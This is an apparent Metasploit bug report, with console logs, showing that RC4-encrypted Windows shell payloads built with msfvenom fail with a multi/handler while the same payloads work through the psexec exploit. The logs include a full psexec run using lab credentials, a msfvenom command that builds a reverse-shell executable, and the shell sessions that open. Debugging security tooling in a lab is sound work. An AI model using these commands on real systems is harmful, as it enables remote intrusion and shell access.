RC4 windows shell payloads broken when using venom

[bwatters-r7]

It appears that RC4 encrypted shell payloads built with venom are incompatible with rc4 encrypted handlers in framework? Automated testing suggests this is something across both staged and stageless x86 and x64 windows shell payloads. (Unsure if this is also a mettle problem)

This is not the case with rc4 encrypted payloads created by framework for use in exploits; those appear to work. It is only when you build the payload in venom and call back to a multi/handler.

Meterpreter sessions do not appear to be affected.

Works fine as part of an exploit:

msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.134.164  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               vagrant          no        The password for the specified username
   SMBUser               vagrant          no        The username to authenticate as


Payload options (windows/x64/shell/reverse_tcp_rc4):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   EXITFUNC     thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST        192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT        4567             yes       The listen port
   RC4PASSWORD  msf              yes       Password to derive RC4 key from


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/psexec) > set rc4password secret
rc4password => secret
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] 192.168.134.164:445 - Connecting to the server...
[*] 192.168.134.164:445 - Authenticating to 192.168.134.164:445 as user 'vagrant'...
[!] 192.168.134.164:445 - No active DB -- Credential data will not be saved!
[*] 192.168.134.164:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.134.164:445 - PowerShell found
[*] 192.168.134.164:445 - Selecting PowerShell target
[*] 192.168.134.164:445 - Powershell command length: 2788
[*] 192.168.134.164:445 - Executing the payload...
[*] 192.168.134.164:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.164[\svcctl] ...
[*] 192.168.134.164:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.164[\svcctl] ...
[*] 192.168.134.164:445 - Obtaining a service manager handle...
[*] 192.168.134.164:445 - Creating the service...
[+] 192.168.134.164:445 - Successfully created the service
[*] 192.168.134.164:445 - Starting the service...
[*] Sending stage (340 bytes) to 192.168.134.164
[+] 192.168.134.164:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.134.164:445 - Removing the service...
[+] 192.168.134.164:445 - Successfully removed the service
[*] 192.168.134.164:445 - Closing service handle...
[*] Command shell session 1 opened (192.168.135.168:4567 -> 192.168.134.164:49945) at 2019-10-30 06:38:03 -0500

ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : moose
   IPv6 Address. . . . . . . . . . . : fd34:fe56:7891:2f3b:4cd1:ef19:f75f:fe57
   IPv6 Address. . . . . . . . . . . : fd34:fe56:7891:2f3b:ffff:defb:a366:5d3
   Temporary IPv6 Address. . . . . . : fd34:fe56:7891:2f3b:38f0:fd27:85f1:52ab
   Link-local IPv6 Address . . . . . : fe80::4cd1:ef19:f75f:fe57%4
   IPv4 Address. . . . . . . . . . . : 192.168.134.164
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::21b:21ff:fe36:e9b5%4
                                       192.168.134.254

C:\Windows\system32>exit
exit

Fails when using venom:

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p windows/shell/reverse_tcp_rc4 -f exe -o winshellrc4.exe RC4PASSWORD=secret LHOST=192.168.135.168 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 458 bytes
Final size of exe file: 73802 bytes
Saved as: winshellrc4.exe

msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_rc4
payload => windows/shell/reverse_tcp_rc4
msf5 exploit(multi/handler) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > set rc4password secret
rc4password => secret
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (271 bytes) to 192.168.134.164
[*] Command shell session 2 opened (192.168.135.168:4567 -> 192.168.134.164:51479) at 2019-10-30 06:49:00 -0500

ipconfig







ipconfig







^C

I'm on commit b7acbfe

[space-r7]

I tested this out yesterday and got the same results:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_rc4
payload => windows/shell/reverse_tcp_rc4
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > set rc4password secret
rc4password => secret
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (271 bytes) to 192.168.37.136
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49160) at 2019-10-31 09:42:57 -0500
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (271 bytes) to 192.168.37.136
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2019-10-31 09:42:57 -0500

whoami


background

Background session 2? [y/N]  y
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell windows                   192.168.37.1:4444 -> 192.168.37.136:49160 (192.168.37.136)
  2         shell x86/windows               192.168.37.1:4444 -> 192.168.37.136:49161 (192.168.37.136)

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

[*] 192.168.37.136 - Command shell session 1 closed.
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

whoami

net users